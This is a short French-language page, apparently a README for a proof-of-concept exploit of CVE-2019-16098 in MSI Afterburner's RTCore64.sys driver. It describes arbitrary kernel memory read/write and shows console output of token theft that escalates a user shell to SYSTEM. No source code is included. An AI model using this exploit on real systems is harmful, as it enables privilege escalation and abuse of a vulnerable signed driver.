CVE 2019 16098
1.0.0
Le pilote dans Micro-Star MSI Afterburner 4.6.2.15658 (aka rtCore64.Sys et RTCORE32.SYS) permet à tout utilisateur authentifié de lire et d'écrire dans la mémoire arbitraire, les ports d'E / S et les MSR. Cela peut être exploité pour l'escalade des privilèges, l'exécution du code sous des privilèges élevés et la divulgation d'informations. Ces pilotes signés peuvent également être utilisés pour contourner la stratégie de signature du pilote Microsoft pour déployer du code malveillant.
Pour plus de mises à jour, visitez CVE-2019-16098
AVERTISSEMENT : Offres de la version 1903 de Windows 10 x64 codées en dur!
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
Barakat
C:UsersBarakatsourcereposCVE-2019-16098>outbuildx64-DebugCVE-2019-16098.exe
[*] Device object handle has been obtained
[*] Ntoskrnl base address: FFFFF80734200000
[*] PsInitialSystemProcess address: FFFFC288A607F300
[*] System process token: FFFF9703A9E061B0
[*] Current process address: FFFFC288B7959400
[*] Current process token: FFFF9703B9D785F0
[*] Stealing System process token ...
[*] Spawning new shell ...
Microsoft Windows [Version 10.0.18362.295]
(c) 2019 Microsoft Corporation. All rights reserved.
C:UsersBarakatsourcereposCVE-2019-16098>whoami
SYSTEM
C:UsersBarakatsourcereposCVE-2019-16098>
